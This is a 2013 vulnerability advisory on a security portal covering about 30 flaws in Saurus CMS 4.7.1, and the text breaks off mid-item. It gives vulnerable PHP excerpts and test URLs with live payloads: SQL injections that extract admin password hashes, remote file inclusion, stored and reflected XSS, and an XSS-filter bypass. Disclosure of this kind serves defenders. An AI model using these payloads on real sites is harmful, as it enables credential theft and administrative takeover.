Waraxe IT Security Portal
Login or Register
December 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 96
Members: 0
Total: 96
Full disclosure
CyberDanube Security Research 20241219-0 | Authenticated Remote Code Execution in Ewon Flexy 205
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
[waraxe-2013-SA#106] - Multiple Vulnerabilities in Saurus CMS 4.7.1





Author: Janek Vind "waraxe"
Date: 14. July 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-106.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Web publishing system combining daily content management features with site
administration and development tools.

http://www.saurus.info/

Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested:

http://www.saurus.info/version-history/


###############################################################################
1. Local File Inclusion in "admin/fckeditor_dialog_image.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "dialog"
Preconditions:
1. Logged in as Saurus CMS user
2. At least one valid file ID must be known (can be bruteforced)

Php script "admin/fckeditor_dialog_image.php" line 101:
------------------------[ source code start ]----------------------------------
$object = new Objekt(array(
'objekt_id' => (int)$site->fdat['file_id'],
'on_sisu' => 1,
));
...
include_once('../js/fckeditor/editor/'.$site->fdat['dialog']);
------------------------[ source code end ]------------------------------------

Test (parameter "file_id" must be valid):

http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess

Result: contents of ".htaccess" file from Saurus CMS root directory will be
revealed, LFI confirmed.


###############################################################################
2. Local File Inclusion in "extensions/saurus4/captcha_image.php"
###############################################################################

Reason:
1. uninitialized variable "$captcha"
Attack vector:
1. user-supplied parameter "captcha"
Preconditions:
1. PHP setting "register_globals = on"


Php script "extensions/saurus4/captcha_image.php" line 45:
------------------------[ source code start ]----------------------------------
switch ($captcha['image_type'])
{
case 'gif':
include_once($class_path.'lgpl/GotchaGIF.class.php');
$img = new GotchaGIF($captcha['image_width'], $captcha['image_height']);
break;
...
if($img->create())
{
//apply effects
foreach($captcha['effects'] as $effect)
{
$effect_name = $effect['name'];
//echo $effect_name;
include_once($class_path.'lgpl/'.$effect_name.'.class.php');
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/extensions/saurus4/captcha_image.php?
captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50&
captcha[effects][0][name]=../waraxe

Result:

Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]:
failed to open stream: No such file or directory in
C:apache_wwwsaurus471extensionssaurus4captcha_image.php on line 73

PHP error message above confirms LFI vulnerability.


###############################################################################
3. Local File Inclusion in "admin/edit.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "extension_path"
Preconditions:
1. Logged in as Saurus CMS user


Php script "admin/edit.php" line 76:
------------------------[ source code start ]----------------------------------
if($site->fdat['extension_path'])
{
$actions_file = '..'.$site->fdat['extension_path'].'/actions.inc.php';
...
if (file_exists($actions_file)){
include_once($actions_file);
------------------------[ source code end ]------------------------------------


###############################################################################
4. Remote File Inclusion in "map.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "cmd"
Preconditions:
1. Windows server


Php script "map.php" line 56:
------------------------[ source code start ]----------------------------------
$tmp_cmd=explode("/",$_GET['cmd']);
...
foreach($tmp_cmd as $t){

// if the there is a .php in the URL then don't use aliases go directly to that file
if(preg_match('/.php$/i', $t) && file_exists($t) && !preg_match("#^../#", $t))
...
include($t);
------------------------[ source code end ]------------------------------------

On *nix servers this code above is secure enough, but things change in case of
Windows server - attacker is able to use backslashes, which leads to RFI.

Example attack using local file:

http://localhost/saurus471/map.php?cmd=........ est.php

Example attack using remote file:

http://localhost/saurus471/map.php?cmd=\192.168.1.25 est.php


###############################################################################
5. Remote File Inclusion in "admin/change_config.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"


Php script "admin/change_config.php" line 25:
------------------------[ source code start ]----------------------------------
global $class_path;
...
if(!isset($class_path)) {
$class_path = "../classes/";
}
...
include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/?


###############################################################################
6. Remote File Inclusion in "admin/repair_database.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"


Php script "admin/repair_database.php" line 23:
------------------------[ source code start ]----------------------------------
global $class_path;

if(!isset($class_path)) {
$class_path = "../classes/";
}

include_once($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/?


###############################################################################
7. Remote File Inclusion in "admin/check_adminpage.php"
###############################################################################

Reason:
1. uninitialized variable "$class_path"
Attack vector:
1. user-supplied parameter "class_path"
Preconditions:
1. PHP setting "register_globals = on"


Php script "admin/check_adminpage.php" line 29:
------------------------[ source code start ]----------------------------------
if(!isset($class_path)) { $class_path = "../classes/"; }

include($class_path."port.inc.php");
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/?


###############################################################################
8. SQL Injection in "index.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "pg"
Preconditions:
1. PHP setting "magic_quotes_gpc = Off"


Php script "index.php" line 303:
------------------------[ source code start ]----------------------------------
if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] &&
!$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){
$myid = $_GET['id'] ? $_GET['id'] : $_GET['pg'];
$sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON
keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'";
$sth = new SQL($sql);
$mykeel = $sth->fetchsingle();
------------------------[ source code end ]------------------------------------

As seen above, user-submitted GET parameters "id" and "pg" are checked to be
numeric before using them in SQL query. If we analyze source code more closely,
then it appears to be not as secure as planned by programmer. Attacker can input
GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection
string containing single quote. As parameter "id" is numeric, checking code will
be bypassed. Next line of code tests parameter "id" and because it is zero,
variable "$myid" will get value from parameter "pg". This leads to SQL Injection.

Test 1:

http://localhost/saurus471/?speed_debug=on&id=0&pg=123

Result: "Page was generated in 1.20000 seconds.", normal server response.

Test 2:

http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection
confirmed.


###############################################################################
9. SQL Injection in "classes/sapi/function.init_search_results.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sites"
Preconditions: none


Php script "classes/sapi/function.init_search_results.php" line 27:
------------------------[ source code start ]----------------------------------
function smarty_function_init_search_results($params,&$smarty) {
...
if(!isset($sites)) $sites = $site->fdat['sites'];
...
$pre_search_explode=explode(",",strtolower(trim($sites)));
foreach($pre_search_explode as $k=>$v){
$pre_search_explode[$k]=trim($v);
}
$sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')";
...
$sth = new SQL($sql_keel);
while($r = $sth->fetch("ASSOC")){
$keeled[]=$r['keel_id'];
------------------------[ source code end ]------------------------------------

As seen above, user-submitted parameter "sites" ends up used in SQL query
without proper sanitization, which leads to SQL Injection vulnerability.

Test 1:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe

Result: "Page was generated in 1.18560 seconds.", normal server response.

Test 2:

http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23

Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection
confirmed.


###############################################################################
10. SQL Injection in "admin/error_log.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/error_log.php" line 63:
------------------------[ source code start ]----------------------------------
$algus_aeg = $site->fdat['algus']? $site->fdat['algus'] : date("d.m.Y",$start_d);
$lopp_aeg = $site->fdat['lopp']? $site->fdat['lopp'] : date("d.m.Y");
...
if ($algus_aeg) {
$where_sql[] = " error_log.time_of_error>='".$site->db->ee_MySQL($algus_aeg)." 00:00' ";
}
if ($lopp_aeg) {
$where_sql[] = " error_log.time_of_error<='".$site->db->ee_MySQL($lopp_aeg)." 23:59' ";
}
if ($site->fdat['err_type']) {
$where_sql[] = " error_log.err_type = '".$site->fdat['err_type']."' ";
}
...
$where_str = sizeof($where_sql)>0 ? " WHERE ".join(" AND ",$where_sql) : '';
...
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'time_of_error';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'DESC';
...
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
...
$sql = $site->db->prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*");
$sql .= $from_sql;
$sql .= $where_str;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
...
$sth = new SQL($sql);
...
while ( $log = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23

Result:

MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23


Result:

Username and password hash of the Saurus CMS user with ID 1 will be revealed


###############################################################################
11. SQL Injection in "admin/extensions.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/extensions.php" line 297:
------------------------[ source code start ]----------------------------------
$site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'name';
$site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'ASC';
...
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
...
$sql = $site->db->prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*");
$sql .= $from_sql;
$sql .= $order;
...
$sth = new SQL($sql);
...
while ( $ext = $sth->fetch() ) {
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/extensions.php?sortby=1

Result: normal server response, no additional delay.

Test 2:

http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23

Result: additionial delay observed, SQL Injection confirmed.


###############################################################################
12. SQL Injection in "admin/profile_data.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/profile_data.php" line 521:
------------------------[ source code start ]----------------------------------
if($site->fdat['sortby']){
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
}
...
$sql .= $from_sql;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
$sth = new SQL($sql);
...
if($sth->rows){
...
while($asset = $sth->fetch()){
------------------------[ source code end ]------------------------------------


###############################################################################
13. SQL Injection in "classes/user_html.inc.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "sortby" and "sort"
Preconditions:
1. logged in as Saurus CMS admin


Php script "classes/user_html.inc.php" line 313:
------------------------[ source code start ]----------------------------------
$order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort'];
...
$sql = $site->db->prepare("SELECT users.* FROM users ");
$sql .= $join;
$sql .= $where;
$sql .= $order;
$sql .= $pagenumbers['limit_sql'];
...
$sth = new SQL($sql);
...
while($tmp = $sth->fetch()){
------------------------[ source code end ]------------------------------------

###############################################################################
14. SQL Injection in "admin/sys_sonad_loetelu.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "sst_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/sys_sonad_loetelu.php" line 123:
------------------------[ source code start ]----------------------------------
$sst_id = ($site->fdat['sst_id'] ? $site->fdat['sst_id'] : $glossary_word_types[0]['sst_id']);

if(is_numeric($site->fdat['flt_keel']))
{
...
$otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR
sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE
'%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR
sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_id;
$where_str = $site->db->prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ",
$keel_id,
1
);
...
$sql .= $where_str;
...
$sth = new SQL($sql);
...
while ( $mysona = $sth->fetch('ASSOC') )
{
$words[] = $mysona;
}
------------------------[ source code end ]------------------------------------

Test 1:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23

Result:

MySQL version info will be revealed

Test 2:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23

Result:

Username and password hash of the Saurus CMS user with ID 1 will be revealed


###############################################################################
15. SQL Injection in "admin/change_config.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "timezone"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/change_config.php" line 153:
------------------------[ source code start ]----------------------------------
$q="update config set sisu='".$site->fdat['timezone']."' where nimi='time_zone'";
new SQL($q);
------------------------[ source code end ]------------------------------------


###############################################################################
16. Stored XSS in "admin/log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "user"
Preconditions:
1. 1. "Enable site log" enabled (it is by default)


Php script "classes/site.class.php" line 538:
------------------------[ source code start ]----------------------------------
if($this->fdat["op"] == 'login' && $this->fdat["url"] &&
$this->CONF['disable_form_based_login'] != "1") {
$this->user = new User(array(
user => $this->fdat["user"],
pass => $this->fdat["pass"],
"site" => &$this,
));
$user_id = $this->user->user_id;

if ($user_id) {
...
else {
# kirjuta logi
new Log(array(
'action' => 'log in',
'component' => 'Users',
'type' => 'NOTICE',
'message' => "Unauthorized access to CMS:
username '".$this->fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'",
));
------------------------[ source code end ]------------------------------------

As seen above, in case of failed login attempt site log entry will be created,
containing various information, including submitted username.


Php script "admin/log.php" line 265:
------------------------[ source code start ]----------------------------------
<?php foreach ($log_records as $log_record) { //printr($log_record); ?>
...
<td><?=$log_record['message'];?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for sitelog view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise. Possible attack scenario: 1. Stored XSS insertion,
2. admin opens log.php, XSS payload steals CSRF token, 3. CSRF attack, new admin
account creation, 4. attacker logs in as new admin, game over ...

Test:

1. Issue GET request as below:

http://localhost/saurus471/admin/?op=login&url=1&user=<script>alert(123);</script>

2. Log in as Saurus CMS admin and open site log page:

http://localhost/saurus471/admin/log.php

Result:

javascript alert box pops up, confirming Stored XSS vulnerability.


###############################################################################
17. Stored XSS in "admin/error_log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Preconditions:
1. "Save PHP and MySQL errors into the database" enabled (it is by default)


Php script "classes/port.inc.php" line 150:
------------------------[ source code start ]----------------------------------
function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){
...
if (!defined("SAVE_ERROR_LOG")){

$res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'");
if ($res){
list($tmp) = @mysql_fetch_array($res);
}
define("SAVE_ERROR_LOG", ($tmp ? 1:0));
}


if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){
@mysql_query("INSERT INTO error_log (time_of_error, source, err_text,
err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(),
'".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."',
'PHP', '".addslashes($_SERVER['HTTP_HOST'])."',
'".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat).
"', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')");
}
}

}

# Redefine error handler
$old_error_handler = set_error_handler("saurusErrorHandler");
------------------------[ source code end ]------------------------------------

As seen above, new PHP error handler is defined, which writes all PHP error
messages to error log in database.


Php script "admin/error_log.php" line 320:
------------------------[ source code start ]----------------------------------
<td width="60%"><?= $log['err_text'] ?></td>
------------------------[ source code end ]------------------------------------

We can see, that php script "admin/log.php", used by admins for error log view,
does not implement proper encoding or escaping of output, leading to Stored
XSS vulenrability. Because this specific XSS payload can be inserted by anonymous
user, but target victim is admin, then it has serious security impact and can
lead to site full compromise by similar scenario as described in previous case.

Test:

1. Issue GET request as below (MySQL Injection from one of the previous cases):

http://localhost/saurus471/?id=0&pg='<script>alert(123);</script>

2. Log in as Saurus CMS admin and open erro log page:

http://localhost/saurus471/admin/error_log.php

Result:

javascript alert box pops up, confirming Stored XSS vulnerability.


###############################################################################
18. XSS protection bypass in "classes/port.inc.php"
###############################################################################

Php script "classes/port.inc.php" line 536:
------------------------[ source code start ]----------------------------------
if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && (
detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) ||
detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) ||
detect_xss_in_string($_SERVER['PHP_SELF']) ||
detect_xss_in_saurus_params($_POST) ||
detect_xss_in_saurus_params($_GET))
)
{
header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php');
exit;
}
------------------------[ source code end ]------------------------------------

We can see, that XSS detection functions are used against various input parameters
and in case of positive hit redirection to home page follows. There is custom
exclusion in place for administrative scripts and it's implementation is not
secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string
in URI and XSS detection will be bypassed.
String for XSS detection bypass is "/saurus471/admin/" in examples below.

Test 1:

http://localhost/saurus471/kalender.php?month=<script>

Result: XSS detected, redirection follows

Test 2:

http://localhost/saurus471/kalender.php?/saurus471/admin/&month=<script>

Result: XSS not detected, no redirection


###############################################################################
19. Reflected XSS in "kalender.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions: none


Php script "kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.value=selected_date;
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.focus();
...
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
$month = $site->fdat['month'];
...
defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
20. Reflected XSS in "editor/kalender.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month"
Preconditions:
1. must be logged in as user


Php script "editor/kalender.php" line 50:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
//<!--
// Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.value=selected_date;
opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];}
else{ echo $site->fdat['vorm'];}?>.
<?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];}
else{ echo $site->fdat['lahter'];}?>.focus();
...
if($site->fdat['month']>=1&&$site->fdat['month']<=12)
{
$month = $site->fdat['month'];
...
defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/editor/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
21. Reflected XSS in "admin/delete_log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "tbl"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/delete_log.php" line 176:
------------------------[ source code start ]----------------------------------
<input type="hidden" name="tbl" value="<?=$site->fdat['tbl']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/delete_log.php?tbl="><script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
22. Reflected XSS in "admin/edit_adminpage.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "id" and "op"
Preconditions:
1. logged in as Saurus CMS admin


Tests:

http://localhost/saurus471/admin/edit_adminpage.php?id="><script>alert(123);</script>
http://localhost/saurus471/admin/edit_adminpage.php?op="><script>alert(123);</script>

Results:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
23. Reflected XSS in "admin/edit_group.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "group_id"
Preconditions:
1. logged in as Saurus CMS admin


Tests:

http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"><script>alert(123);</script>

Result:

javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.


###############################################################################
24. Reflected XSS in "admin/profile_data.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/profile_data.php" line 65:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['profile_id']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/profile_data.php?profile_id=<script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
25. Reflected XSS in "admin/edit_object.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/edit_object.php" line 101:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$profile_id."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,<script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
26. Reflected XSS in "admin/edit_profile.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "pid"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/edit_profile.php" line 997:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['pid']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid=<script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
27. Reflected XSS in "admin/profiles.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "profile_id", "source_table", "did"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/profiles.php" line 247:
------------------------[ source code start ]----------------------------------
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
('edit_profile.php?op=newdef&pid=<?= $site->fdat['profile_id'] ?>
...
<TD class="scms_dropdown_item"><a href="javascript:void(openpopup
('edit_profile.php?op=new&pid=<?= $site->fdat['profile_id']?>
&source_table=<?= $site->fdat['source_table']?>
...
<TD nowrap><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=edit&pid=<?= $site->fdat['profile_id']?>
&did=<?= $site->fdat['did']?>'
...
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=delete&pid=<?= $site->fdat['profile_id']?>
...
<TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup
('edit_profile.php?op=duplicate&pid=<?= $site->fdat['profile_id']?>
&did=<?=$site->fdat['did']?>'
...
<TD><a href="<?= $site->self ?>?profile_id=<?= $site->fdat['profile_id']?>&op=sync"
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/profiles.php?profile_id="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?source_table="><script>alert(123);</script>
http://localhost/saurus471/admin/profiles.php?profile_id=z&did="><script>alert(123);</script>

Results:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
28. Reflected XSS in "admin/sys_alias.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "flt_keel" and "keel_id"
Preconditions:
1. logged in as Saurus CMS admin


Test:

http://localhost/saurus471/admin/sys_alias.php?flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/sys_alias.php?keel_id="><script>alert(123);</script>

Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
29. Reflected XSS in "admin/sys_sonad_loetelu.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "flt_keel"
Preconditions:
1. logged in as Saurus CMS admin


Test:

http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=</script><script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
30. Reflected XSS in "admin/user_management.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/user_management.php" line 138:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) {
if($fdat_field != 'selected_devices'){
